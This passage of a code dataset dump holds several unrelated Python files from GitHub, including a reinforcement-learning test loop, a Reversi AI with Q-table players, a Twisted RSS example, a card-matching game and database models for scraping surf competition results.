\r\n\r\n actor = Actor(state_size, action_size)\r\n \r\n \r\n if load: ## 경로를 model 파일 경로+ model 파일 이름으로 변경해주세요. 저는 원래 episode 번호로 구분했습니다.\r\n actor.load_state_dict(torch.load(os.path.join('C:/SAIDA_RL/python/saida_agent_example/vultureZealot/save_ppo3_clear/','clear_ppo_actor_'+str(episode)+'.pkl')))\r\n \r\n actor_optimizer = optim.Adam(actor.parameters(), lr=learning_rate)\r\n \r\n episode = 0\r\n clear_cnt=0\r\n for n_iter in range(1000):\r\n step = 0\r\n \r\n state = env.reset()\r\n \r\n state = rearrange_State(state, state_size, env)\r\n episode+=1\r\n temp_score = 0.0\r\n while True:\r\n \r\n prob_each_actions = actor(torch.Tensor(state), soft_dim=0)\r\n \r\n distribution = Categorical(prob_each_actions)\r\n \r\n action = distribution.sample().item() \r\n \r\n next_state, reward, done, info = env.step([action])\r\n next_state = rearrange_State(next_state, state_size, env)\r\n \r\n reward = reward_reshape(state, next_state, reward, done) \r\n \r\n mask = 0 if done else 1 \r\n \r\n state = next_state\r\n \r\n temp_score += reward \r\n \r\n if next_state[3] == 1.0 and next_state[-6] == 0:\r\n clear_cnt+=1\r\n print(\"clear: \",next_state[3],next_state[-6],\"clear_score: \",temp_score, \"clear_cnt: \", clear_cnt,\" / \", n_iter+1)\r\n \r\n if done: \r\n print(\"step: \", step, \"per_episode_score: \",temp_score)\r\n \r\n break\r\n\r\n print(\"clear count: \",clear_cnt,\" percent: \",(clear_cnt/n_iter)) \r\n env.close()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"betastarcraft/Problem_1","sub_path":"01_Vulture_vs_Zealot/Perfect_Performance_test/vz_PPO_test.py","file_name":"vz_PPO_test.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26276723435","text":"total = 0\n\ndef get_mul(num):\n sum = 1\n while num > 1:\n sum *= num\n num -= 1\n return sum\ndef get_num(s, num, d, sum):\n if d <= 0:\n return\n if sum <= 0:\n return\n if num * num > sum:\n get_num(s, num - 1, d, sum)\n if num * num == sum:\n global total\n total += 2**(27-d+1) * get_mul(len(set(s+str(num))))\n # print(24-d+1, len(set(s+str(num))) - 1)\n print(s + str(num) + '0' * (d - 1) + ' ' + str(2**(24-d+1) * get_mul(len(set(s+str(num))) - 1)))\n while num > 0:\n if num * num < sum:\n # print(s + str(num), num - 1, d - 1, sum - num * num)\n if (num)**2 <= sum - num * num:\n get_num(s + str(num), num, d - 1, sum - num * num)\n else:\n get_num(s + str(num), num - 1, d - 1, sum - num * num)\n num -= 1\nget_num(' ', 8, 24, 79)\nprint(total)","repo_name":"xiaoxiongfeng/lattice","sub_path":"zn.py","file_name":"zn.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14774213674","text":"from collections import OrderedDict\n\nd = OrderedDict()\nd['foo'] = 1\nd['bar'] = 2\nd['span'] = 4\nprint(d)\nfor key in d:\n print(key, d[key])\n\nimport json\n\nj = json.dumps(d)\nprint(j)\n\nj = json.loads(j)\nprint(j)\n","repo_name":"ayumi64/Python_Cookbook_Learn","sub_path":"Section01 数据结构和算法/s1.7_字典排序.py","file_name":"s1.7_字典排序.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17497666515","text":"from __future__ import nested_scopes\n\nfrom twisted.web import resource as resourcelib\nfrom twisted.web import client, microdom, domhelpers, server\n\nurlTemplate = 'http://www.livejournal.com/users/%s/rss'\n\nclass LJSyndicatingResource(resourcelib.Resource):\n\n def render_GET(self, request):\n url = urlTemplate % request.args['user'][0]\n client.getPage(url).addCallback(\n microdom.parseString).addCallback(\n lambda t: domhelpers.findNodesNamed(t, 'item')).addCallback(\n lambda itms: zip([domhelpers.findNodesNamed(x, 'title')[0]\n for x in itms],\n [domhelpers.findNodesNamed(x, 'link')[0]\n for x in itms]\n )).addCallback(\n lambda itms: '

      %s
    ' %\n '\\n'.join(\n ['
  • %s
  • ' % (\n domhelpers.getNodeText(link), domhelpers.getNodeText(title))\n for (title, link) in itms])\n ).addCallback(lambda s: (request.write(s),request.finish())).addErrback(\n lambda e: (request.write('Error: %s' % e),request.finish()))\n return server.NOT_DONE_YET\n\nresource = LJSyndicatingResource()\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"contrib/twisted/TwistedWeb-0.6.0/doc/examples/lj.rpy.py","file_name":"lj.rpy.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"40045448266","text":"from pycat.window import Window\nfrom pycat.sprite import Sprite, RotationMode\nfrom pycat.keyboard import KeyCode\nfrom pycat.scheduler import Scheduler\nfrom pycat.collision import is_aabb_collision\nfrom pycat.label import Label\nimport random\n\nw = Window(background_image=\"forest_04.png\", draw_sprite_rects=True)\n\ncL_sprite = [] \n\nclass Card (Sprite):\n\n def on_create(self):\n self.is_visible = False\n \n\n def on_left_click(self):\n if self in cL_sprite:\n pass\n else:\n if len(cL_sprite) < 2 :\n self.is_visible = True\n cL_sprite.append(self)\n\nscore = 0\n\nclass Button(Sprite):\n\n def on_create(self):\n self.image = \"button.png\"\n self.scale = float(0.66)\n self.x = 1100\n self.y = 300\n def on_left_click(self):\n if len(cL_sprite) == 2:\n sprite1:Sprite = cL_sprite[0]\n sprite2:Sprite = cL_sprite[1]\n if sprite1.image == sprite2.image: \n sprite1.delete()\n sprite2.delete()\n button.score += 1\n score_label.text = 'BEST MATCH: '+str(button.score)\n else:\n sprite1.is_visible = False \n sprite2.is_visible = False\n cL_sprite.clear()\n\nbutton = w.create_sprite(Button)\nbutton.score = 0\n\nscore_label = Label(\"BEST MATCH: 0\",x=1000,y=400)\nw.add_label(score_label)\n\np1 = w.create_sprite(Card, x = 200,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np2 = w.create_sprite(Card, x = 200,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np3 = w.create_sprite(Card, x = 200,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np4 = w.create_sprite(Card, x = 200,y = 460, image = \"avatar_04.png\", scale = float(1.6))\np5 = w.create_sprite(Card, x = 400,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np6 = w.create_sprite(Card, x = 400,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np7 = w.create_sprite(Card, x = 400,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np8 = w.create_sprite(Card, x = 400,y = 460, image = \"avatar_04.png\", scale = float(1.6))\np08 = w.create_sprite(Card, x = 600,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np07 = w.create_sprite(Card, x = 600,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np06 = w.create_sprite(Card, x = 600,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np05 = w.create_sprite(Card, x = 600,y = 460, image = \"avatar_04.png\", scale = float(1.6))\np04 = w.create_sprite(Card, x = 800,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np03 = w.create_sprite(Card, x = 800,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np02 = w.create_sprite(Card, x = 800,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np01 = w.create_sprite(Card, x = 800,y = 460, image = \"avatar_04.png\", scale = float(1.6))\n\nw.run()","repo_name":"duck003/pypeanuts.github.io","sub_path":"chapter/chapter04/4-1ft.py","file_name":"4-1ft.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23020548374","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport copy\nimport random\nimport ReverseCommon\nimport ReverseBoard\nimport Game\nimport sys, os\nimport pickle\nimport numpy as np\nfrom functions import sigmoid, softmax, dtanh, init_KeysCount, myMax, myMin, myRandom, dMean_squared_error\n\n\"\"\" プレーヤの基盤クラス(AIも含む) \"\"\"\nclass Player:\n def __init__(self, color):\n \"\"\" コンストラクタ \"\"\"\n self._color = color\n self.network = {}\n self._history = []\n\n def next_move(self, board):\n \"\"\" 次の手を返す \"\"\"\n pass\n\n def save_network(self, file_name):\n pass\n\n def update_network(self, ritu=1, weight_init_std = 0.01):\n pass\n\n @property\n def color(self):\n \"\"\" 自分の色を返す \"\"\"\n return self._color\n\n\"\"\" ランダムで石を置くAI \"\"\"\nclass RandomAi(Player):\n def next_move(self, board):\n # 石を置ける全候補地\n all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # ランダムで次の手を選ぶ\n index = random.randint(0, len(all_candidates) - 1)\n return all_candidates[index]\n\n\"\"\"今回の1手で最も石が取れる場所に置くAI\"\"\"\nclass NextStoneMaxAi(Player):\n def next_move(self, board):\n # 石を置ける全候補地\n all_candidatess = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # 今回の一手で最も石が取れる場所一覧\n filtered_candidates = []\n max_score = -1\n for candidates in all_candidatess:\n next_board = ReverseCommon.put_stone(board.stone_status, self._color, candidates[0], candidates[1])\n score = ReverseCommon.get_score(board.stone_status, self._color)\n if score >= max_score:\n filtered_candidates.append(candidates)\n max_score = score\n\n return filtered_candidates[random.randint(0, len(filtered_candidates) - 1)]\n\n\"\"\"人間です。\"\"\"\nclass Human(Player):\n def next_move(self, board):\n all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n while True:\n try:\n # x,yの形式で入力する\n next_move_str = raw_input(\"next_move > \")\n next_move_str_split = next_move_str.split(\",\")\n if len(next_move_str_split) == 2:\n next_move = [int(next_move_str_split[0]), int(next_move_str_split[1])]\n if next_move in all_candidates:\n return next_move\n else:\n print (\"can't put there.\")\n except ValueError:\n print (\"format error.\")\n\n\"\"\" 最低限の手の良し悪しを知っているAI \"\"\"\nclass RandomAiKnowGoodMove(Player):\n def next_move(self, board):\n known_good_moves = [[0, 0], [0, 7], [7, 0], [7, 7]]\n known_bad_moves = [[0, 1], [1, 0], [1, 1], [0, 6], [1, 6], [1, 7], [6, 0], [6, 1], [7, 1], [7, 6], [6, 7], [6, 6]]\n all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # 4隅が取れるなら取る\n good_moves = list(filter(lambda good_move: good_move in known_good_moves, all_candidates))\n\n if len(good_moves) > 0:\n return good_moves[random.randint(0, len(good_moves) - 1)]\n\n # 4隅に隣接する場所は避ける\n #not_bad_moves = filter(lambda not_bad_move: not_bad_move not in (known_good_moves + known_bad_moves), all_candidates)\n not_bad_moves = list(filter(lambda not_bad_move: not_bad_move not in (known_good_moves + known_bad_moves), all_candidates))\n if len(not_bad_moves) > 0:\n return not_bad_moves[random.randint(0, len(not_bad_moves) - 1)]\n\n return all_candidates[random.randint(0, len(all_candidates) - 1)]\n\n\n\"\"\" DQNで石を置くAI (Deep Q-Network)\"\"\"\nclass DeepQNetWork(Player):\n def __init__(self, color, filename):\n super(DeepQNetWork, self).__init__(color)\n self.KeysCount = {}\n self.load_network(filename)\n\n def load_network(self, file_name=\"DQN_BLACK.pkl\"):\n if os.path.isfile(file_name) :\n with open(file_name, 'rb') as f:\n obj = pickle.load(f)\n self.KeysCount = obj[0]\n self.network = obj[1]\n else:\n self.KeysCount = init_KeysCount(8, 0.5, 5)\n\n count = self.network['SC']\n print(\"累積学習=%s\" %(count))\n\n #print(sorted(self.KeysCount.items(), key=lambda x: x[0]))\n for obj in sorted(self.KeysCount.items(), key=lambda x: int(x[0])):\n print(str(obj[0]) + \"=\" + str(obj))\n\n def save_network(self, file_name=\"DQN_BLACK.pkl\"):\n with open(file_name, 'wb') as f:\n pickle.dump([self.KeysCount, self.network], f)\n\n def update_network(self, ritu=1, weight_init_std = 0.001):\n #print('*'*10 + '(update_network)' + '*'*10)\n #print(str(select) + \"::\" + str(ReverseCommon.IndexToPoint(select)))\n #self._history.append([Key,select])\n for i in range(0,len(self._history)):\n key = self._history[i][0]\n act = self._history[i][1]\n #print(str(i+1) + \" key=\" + key + \" act=\" + str(act) + \" qWait=\" + str(self.network[key][act]))\n if(key in self.network):\n acc = self.network[key][act] + ritu * weight_init_std\n if acc > 10:\n acc = 10\n elif acc < -10:\n acc = -10\n self.network[key][act] = acc\n #self.network[key][act] += ((i % 22) + 1) * ritu * weight_init_std\n #print(self.network[key])\n self._history = []\n\n def next_move(self, board):\n #Key = ReverseCommon.boardToKey(board.stone_status)\n Key = ReverseCommon.boardToKey3(board.stone_status)\n #print(Key)\n actions = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n #print(actions)\n #print(Key in self.network)\n if(not (Key in self.network)):\n self.wait_set(Key, actions, board)\n\n #print(self.network)\n #print(self.network[Key])\n #print(len(self._history))\n if (Key in self.network):\n if self._color == ReverseCommon.BLACK:\n select = min(self.network[Key],key=(lambda x:self.network[Key][x]))\n else:\n select = max(self.network[Key],key=(lambda x:self.network[Key][x]))\n else:\n # 石を置ける全候補地からランダムで次の手を選ぶ\n #all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n #index = random.randint(0, len(all_candidates) - 1)\n #select = ReverseCommon.PointToIndex(all_candidates[index])\n\n # 石を置ける全候補地\n all_candidatess = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # 今回の一手で最も石が取れる場所一覧\n filtered_candidates = []\n max_score = -1\n for candidates in all_candidatess:\n score = ReverseCommon.get_score(board.stone_status, self._color)\n if score >= max_score:\n filtered_candidates.append(candidates)\n max_score = score\n\n index = random.randint(0, len(filtered_candidates) - 1)\n select = ReverseCommon.PointToIndex(filtered_candidates[index])\n #filtered_candidates[random.randint(0, len(filtered_candidates) - 1)]\n\n #print(str(select) + \"::\" + str(ReverseCommon.IndexToPoint(select)))\n self._history.append([Key,select])\n return ReverseCommon.IndexToPoint(select)\n\n \"\"\"\n Dropoutを実装する\n この学習モデルは(白)後手番学習\n Keyは手数によって(2手目6石 6**2、4手目8石 8**2、・・・・、60手目64石 64**2)\n 通の組み合わせがある\n dropout_rait=0.5仮\n 各手番の組み合わせ数 * dropout_rait で調整を試みる\n \"\"\"\n def wait_set(self, Key, actions, board):\n\n aa = ReverseCommon.get_remain(board.stone_status)\n bb = self.KeysCount[str(64-aa)]\n #print(\"%2d::%s::%2d::%2d::%2d::%2d\" % (len(self._history),Key,aa,64-aa,bb[0],bb[1]))\n\n #if (len(self._history) < 2): return\n if (bb[1] >= bb[0]): return\n #print(Key)\n self.KeysCount[str(64-aa)][1] += 1\n wait = {}\n Waits = np.random.random(len(actions))\n i = 0\n for wact in actions:\n wPoint = ReverseCommon.PointToIndex(wact)\n wait[wPoint] = Waits[i]\n i += 1\n #print(str(wact) + \":::\" + str(wPoint) + \":::\" + str(wait[wPoint]))\n\n self.network[Key] = wait\n #print(self.network[Key] )\n\nclass QNetWork(Player):\n def __init__(self, color, filename):\n super(QNetWork, self).__init__(color)\n self.load_network(filename)\n\n def load_network(self,file_name):\n if os.path.isfile(file_name) :\n with open(file_name, 'rb') as f:\n self.network = pickle.load(f)\n\n def save_network(self, file_name):\n with open(file_name, 'wb') as f:\n pickle.dump(self.network, f)\n\n def update_network(self, ritu=1, weight_init_std = 0.001):\n ALPHA = 0.1\n GAMMA = 0.99\n for i in range(0,len(self._history)-1):\n Key, select = self._history[i][0], self._history[i][1]\n #self.network[Key][select] += ALPHA * (reward + GAMMA*self.network[next_s].max() - self.network[Key][select])\n next_key =self._history[i+1][0]\n if next_key in self.network:\n a = min(self.network[next_key],key=(lambda x:self.network[next_key][x]))\n aaa = self.network[next_key][a]\n #print(self.network[next_key][a])\n else:\n aaa = 0.5\n #print(\"Key=%s::select=%s\" %(Key,select))\n bbb = 0.0\n if Key in self.network:\n bbb = self.network[Key][select]\n self.network[Key][select] += ALPHA * (ritu + GAMMA*aaa - bbb)\n #print(\"bef=%f: aft=%f\" %(mmm,self.network[Key][select]))\n #print(\"bbb=%s::aaa=%s\" %(bbb,aaa))\n self._history = []\n\n def wait_set(self, Key, actions):\n #print(Key)\n if len(actions) < 2:\n return\n wait = {}\n Waits = np.random.random(len(actions))\n i = 0\n for wact in actions:\n wPoint = ReverseCommon.PointToIndex(wact)\n wait[wPoint] = Waits[i]\n\n self.network[Key] = wait\n\n def next_move(self, board):\n Key = ReverseCommon.boardToKey3(board.stone_status)\n #print(Key)\n # 石を置ける全候補地\n actions = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n\n if(not (Key in self.network)):\n self.wait_set(Key, actions)\n\n if (Key in self.network):\n if self._color == ReverseCommon.BLACK:\n select = min(self.network[Key],key=(lambda x:self.network[Key][x]))\n else:\n select = max(self.network[Key],key=(lambda x:self.network[Key][x]))\n #print(\"select=%s\" % (select))\n result = ReverseCommon.IndexToPoint(select)\n else:\n # ランダムで次の手を選ぶ\n index = random.randint(0, len(actions) - 1)\n result = actions[index]\n select = ReverseCommon.PointToIndex(result)\n\n self._history.append([Key,select])\n return result\n","repo_name":"mit4351/Reversi","sub_path":"wx_dqn_bkp/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":11649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31213715495","text":"import datetime\nimport re\n\nfrom app import Config, app, db, parsers\nfrom app.models import mixins\n\n\nclass HeatResult(db.Model):\n heat_id = db.Column(db.Integer, db.ForeignKey(\"heat.id\"), primary_key=True)\n athlete_id = db.Column(\n db.Integer,\n db.ForeignKey(\"athlete.id\"),\n # primary_key=True\n )\n\n index = db.Column(db.Integer, primary_key=True)\n score = db.Column(db.Numeric(4, 2), default=None)\n\n heat = db.relationship(\"Heat\", back_populates=\"athletes\")\n athlete = db.relationship(\"Athlete\", back_populates=\"heats\")\n\n\ndef _is_placeholder_athlete_name(athlete_name):\n # probably overkill on precision but whatever\n regexs = [\n \"Round of [0-9]{1,2}, Heat [0-9]{1,2} winner\",\n \"finals, Heat [0-9]{1,2} winner$\",\n \"Event seed #[0-9]{1,2}\",\n \"Round seed #[0-9]{1,2}\",\n ]\n if any([re.search(r, athlete_name) is not None for r in regexs]):\n return True\n return False\n\n\nclass Athlete(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(128))\n heats = db.relationship(\"HeatResult\", back_populates=\"athlete\")\n\n\nclass Heat(mixins.Updatable, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n completed = db.Column(db.Boolean, default=False)\n status = db.Column(db.Integer, default=0)\n round_id = db.Column(db.Integer, db.ForeignKey(\"round.id\"))\n athletes = db.relationship(\"HeatResult\", back_populates=\"heat\")\n\n @classmethod\n def create(cls, **kwargs):\n obj = cls(completed=False, **kwargs)\n obj.update()\n return obj\n\n def _do_update(self):\n try:\n status, scores = parsers.get_heat_data(self.round.url, self.id)\n except Exception as e:\n app.logger.error(e)\n return\n\n app.logger.debug(\n f\"Read scores {scores} for heat {self.id} with status {status}\"\n )\n self.update_with_status_and_scores(status, scores)\n\n def update_with_status_and_scores(self, status, scores):\n self.status = status\n\n for index, (athlete_name, score) in enumerate(scores):\n # if we're being reported a placeholder athlete name,\n # then make sure that the heat hasn't started yet. If it has,\n # we need to investigate\n if _is_placeholder_athlete_name(athlete_name) and status != 0:\n app.logger.warn(\n f\"Still using placeholder name {athlete_name} \"\n f\"in ongoing heat {self.id}\"\n )\n heat_result = HeatResult.query.filter_by(\n heat=self, index=index\n )\n\n try:\n athlete = heat_result.first().athlete\n except AttributeError:\n # case 1: there's no existing entry, so just move on and\n # pretend this never happend\n continue\n\n # case 2: that heat result has a placeholder\n # name attached to it: delete it and move on\n if _is_placeholder_athlete_name(athlete.name):\n app.logger.warn(\n f\"Removing placeholder heat result from heat {self.id}\"\n )\n heat_result.delete()\n continue\n # case 3: that heat used to have a real athete associated\n # with it. I guess keep it for now?\n else:\n athlete_name = athlete.name\n\n # create athlete if they don't exist. Note that his means\n # we will create some placeholder athletes, but\n # they won't have any heat results after things get updated\n athlete = Athlete.query.filter_by(name=athlete_name).first()\n if athlete is None:\n athlete = Athlete(name=athlete_name)\n app.logger.debug(f\"Adding athlete {athlete_name} to database\")\n db.session.add(athlete)\n db.session.commit()\n\n # index heat result by the heat and their order in the heat\n # this way when rounds update from some TBD placeholder to\n # a real athlete name we can update the athlete name accordingly\n # the cost of this is having some placeholder athlete names in\n # our athlete db but that seems like a small price to pay\n heat_result = HeatResult.query.filter_by(\n heat=self, index=index\n ).first()\n\n # first case: this heat result hasn't been created yet\n # instantiate it and add it to our session\n if heat_result is None:\n heat_result = HeatResult(\n heat=self, index=index, athlete=athlete\n )\n self.athletes.append(heat_result)\n else:\n # second case: the heat has been created but the athlete\n # being used to instantiate is being updated\n if heat_result.athlete.name != athlete_name:\n # if this is not because the instantiated athlete was\n # a placeholder, we won't do this automatically, but\n # will leave it to you to do manually if you think this\n # is correct\n if not _is_placeholder_athlete_name(\n heat_result.athlete.name\n ):\n app.logger.warn(\n \"Athlete {} is being replaced by \"\n \"athlete {} in heat {}.\".format(\n heat_result.athlete.name, athlete_name, self.id\n )\n )\n\n # updat the heat result athlete\n heat_result.athlete = athlete\n\n # update the heat result score\n heat_result.score = score\n self.completed = status == 2\n\n\nclass Round(mixins.Updatable, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n completed = db.Column(db.Boolean, default=False)\n number = db.Column(db.Integer)\n event_id = db.Column(db.Integer, db.ForeignKey(\"event.id\"))\n heats = db.relationship(\"Heat\", backref=\"round\", lazy=\"dynamic\")\n\n @property\n def url(self):\n return parsers.get_round_url(self)\n\n @property\n def sorted_heats(self):\n return sorted(self.heats, key=lambda heat: heat.id)\n\n @classmethod\n def create(cls, **kwargs):\n obj = cls(**kwargs)\n heat_ids = parsers.get_heat_ids(obj.url)\n for id in heat_ids:\n app.logger.debug(f\"Creating heat {id}\")\n Heat.create(id=id, round=obj)\n obj.completed = all([heat.completed for heat in obj.heats])\n return obj\n\n def _do_update(self):\n no_more_updates = False\n heats = sorted(self.heats, key=lambda h: h.id)\n for heat in heats:\n if no_more_updates:\n # only update upcoming heats if they're currently\n # populated by placeholder athlete names\n athletes = [r.athlete.name for r in heat.athletes]\n if any(list(map(_is_placeholder_athlete_name, athletes))):\n app.logger.info(f\"Updating athletes for heat {heat.id}\")\n heat.update()\n continue\n else:\n app.logger.info(f\"Updating heat {heat.id}\")\n completed = heat.update()\n\n # if this heat is upcoming, then all proceeding\n # heats in this round are by definition upcoming\n # too, so we can stop trying to update heats\n if heat.status == 0:\n no_more_updates = True\n\n # if the last heat returned completd = True,\n # then we're done\n self.completed = completed\n\n\nclass Event(mixins.Updatable, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n stat_id = db.Column(db.Integer)\n name = db.Column(db.String(128))\n completed = db.Column(db.Boolean, default=False)\n year = db.Column(db.Integer, db.ForeignKey(\"season.year\"))\n rounds = db.relationship(\"Round\", backref=\"event\", lazy=\"dynamic\")\n\n @property\n def url(self):\n return parsers.get_event_url(self)\n\n @property\n def sorted_rounds(self):\n return sorted(self.rounds, key=lambda r: r.number)\n\n @classmethod\n def create(cls, id: int, stat_id: int, name: str, year: int, **kwargs):\n obj = cls(id=id, stat_id=stat_id, name=name, year=year)\n\n # first verify that status is ok and that we're close enough to the\n # event to warrant building it\n status, start_date = parsers.get_event_data_from_event_homepage(obj)\n if status in (\"canceled\", \"postponed\"):\n raise parsers.EventNotReady(\n \"Status for event {} is currently {}\".format(obj.name, status)\n )\n elif (\n datetime.datetime.now()\n + datetime.timedelta(days=Config.LEAD_DAYS_FOR_EVENT_CREATION)\n ) < start_date:\n raise parsers.EventNotReady(\n \"Start date for event {} is {} days away, \"\n \"stopping creation\".format(\n obj.name, (start_date - datetime.datetime.now()).days\n )\n )\n\n # double check that event is ready to be scraped by\n # making sure that all the rounds have valid links\n try:\n round_ids = parsers.get_round_ids(obj)\n except parsers.EventNotReady:\n raise parsers.EventNotReady(\n \"No valid round links for event {}\".format(obj.name)\n )\n\n # initialize all the internal rounds and heats\n kwargs = {\"event\": obj, \"completed\": False}\n for n, round_id in enumerate(round_ids):\n app.logger.debug(f\"Creating round {round_id}\")\n if n < 2:\n round_ = Round.create(id=round_id, number=n, **kwargs)\n continue\n else:\n round_ = Round(id=round_id, number=n, **kwargs)\n break\n\n rounds = parsers.parse_bracket(round_.url)\n for i in range(1, len(rounds) + 1):\n heats = rounds[round_.id]\n for id in sorted(heats.keys()):\n heat = Heat(id=id, completed=False, round=round_)\n status, scores = heats[id]\n heat.update_with_status_and_scores(status, scores)\n\n round_.completed = all([i.completed for i in round_.heats])\n\n if i < len(rounds):\n app.logger.debug(f\"Creating round {round_id + i}\")\n round_ = Round(id=round_id + i, number=2 + i, **kwargs)\n\n # if this is an event from the past, we can set it completed up front\n obj.completed = all([round_.completed for round_ in obj.rounds])\n return obj\n\n @property\n def results(self):\n csv_string = \"RoundNum,HeatNum,AthleteName,Score\"\n for i, round_ in enumerate(self.rounds):\n for j, heat in enumerate(round_.heats):\n for athlete in heat.athletes:\n score = athlete.score or 0.0\n csv_string += \"\\n{},{},{},{:0.2f}\".format(\n i, j, athlete.athlete.name, score\n )\n return csv_string\n\n def _do_update(self):\n sorted_rounds = sorted(self.rounds, key=lambda round: round.id)\n\n # do first two rounds normally\n for round_ in sorted_rounds[:2]:\n if not round_.update():\n break\n else:\n # if both the first two rounds are completed,\n # start iterating through the bracket rounds\n rounds = parsers.parse_bracket(sorted_rounds[2].url)\n all_rounds_complete = True\n\n for round_ in sorted_rounds[2:]:\n if round_.completed:\n continue\n\n all_heats_complete = True\n for heat in round_.sorted_heats:\n if heat.completed:\n continue\n\n status, scores = rounds[round_.id][heat.id]\n heat.update_with_status_and_scores(status, scores)\n\n if not heat.status:\n # if this heat is still upcoming, there's\n # no point in updating anything after this\n break\n all_heats_complete &= heat.completed\n else:\n # if we never broke, then all of the heats\n # have at least started, so mark whether the\n # round has completed and move on to the next\n # one to account for potentially overlapping\n # heats between rounds\n round_.completed = all_heats_complete\n all_rounds_complete &= all_heats_complete\n continue\n\n # otherwise if we broke, one of this round's\n # heats hasn't started which means there's no\n # need to look at later rounds, so\n break\n else:\n # if all the rounds have completed, mark\n # the whole event as done\n self.completed = all_rounds_complete\n\n\nclass Season(db.Model):\n year = db.Column(db.Integer, primary_key=True)\n events = db.relationship(\"Event\", backref=\"season\", lazy=\"dynamic\")\n\n @property\n def url(self):\n return parsers.get_season_url(self)\n\n @classmethod\n def create(cls, year, **kwargs):\n # allow for possibility that season starts in late\n # of the year before\n if year > (datetime.datetime.now().year + 1):\n raise ValueError(f\"Cannot create season for future year {year}\")\n\n # instantiate the season then add all the events we can to it\n obj = cls(year=year, **kwargs)\n db.session.add(obj)\n for name, id in parsers.get_event_ids(obj.url).items():\n # skipping freshwater pro by default since\n # its format is so different\n if name == \"freshwater-pro\":\n continue\n\n # don't need to create events that have already been created\n # not quite sure why or when this might occur but hey why not\n event = Event.query.filter_by(name=name, id=id, season=obj).first()\n if event is not None:\n continue\n\n try:\n stat_id = parsers.get_event_stat_id(id, year, name)\n except ValueError:\n app.logger.info(\n f\"Skipping creation of event {name} {year} \"\n \"because no stat ID was available\"\n )\n continue\n\n # ignore this event if it's not ready yet\n try:\n event = Event.create(\n name=name, id=id, stat_id=stat_id, year=year\n )\n except parsers.EventNotReady:\n continue\n else:\n obj.events.append(event)\n db.session.add(event)\n db.session.commit()\n return obj\n\n\ndef delete_season(year):\n season = Season.query.filter_by(year=year)\n events = Event.query.filter_by(season=season.first())\n for event in events:\n rounds = Round.query.filter_by(event=event)\n for round in rounds:\n heats = Heat.query.filter_by(round=round)\n for heat in heats:\n HeatResult.query.filter_by(heat=heat).delete()\n heats.delete()\n rounds.delete()\n events.delete()\n season.delete()\n","repo_name":"alecgunny/kook-tracker","sub_path":"kook-tracker/app/models/wsl.py","file_name":"wsl.py","file_ext":"py","file_size_in_byte":15695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74988259","text":"from unittest.mock import AsyncMock\n\nimport pytest\n\nfrom crm.agency_cabinet.common.server.common.structs import TaskStatuses\nfrom crm.agency_cabinet.ord.common import structs\nfrom crm.agency_cabinet.ord.proto import reports_pb2, request_pb2, common_pb2\nfrom crm.agency_cabinet.ord.common.exceptions import UnsuitableAgencyException, NoSuchReportException\n\n\n@pytest.fixture(autouse=True)\ndef procedure(mocker):\n mock = AsyncMock()\n mock.return_value = structs.ReportExportResponse(report_export_id=1, status=TaskStatuses.in_progress)\n\n mocker.patch(\n \"crm.agency_cabinet.ord.server.src.procedures.ReportExport\",\n return_value=mock,\n )\n\n return mock\n\n\nasync def test_export_report(handler, procedure):\n expected = reports_pb2.ReportExportOutput(\n result=reports_pb2.ReportExport(\n report_export_id=1,\n status=1\n )\n )\n\n request_pb = request_pb2.RpcRequest(\n report_export=reports_pb2.ReportExportInput(\n agency_id=1,\n report_id=1\n )\n )\n\n data = await handler(request_pb.SerializeToString())\n res = reports_pb2.ReportExportOutput.FromString(data)\n\n assert res == expected\n\n\n@pytest.mark.parametrize(\n ('side_effect', 'expected_message'),\n [\n (\n UnsuitableAgencyException,\n reports_pb2.ReportExportOutput(unsuitable_agency=common_pb2.ErrorMessageResponse(message=''))\n ),\n (\n NoSuchReportException,\n reports_pb2.ReportExportOutput(no_such_report=common_pb2.ErrorMessageResponse(message=''))\n ),\n ]\n)\nasync def test_returns_error(handler, mocker, side_effect, expected_message):\n mock = AsyncMock()\n mock.return_value = None\n mock.side_effect = [side_effect]\n\n with mocker.patch(\n 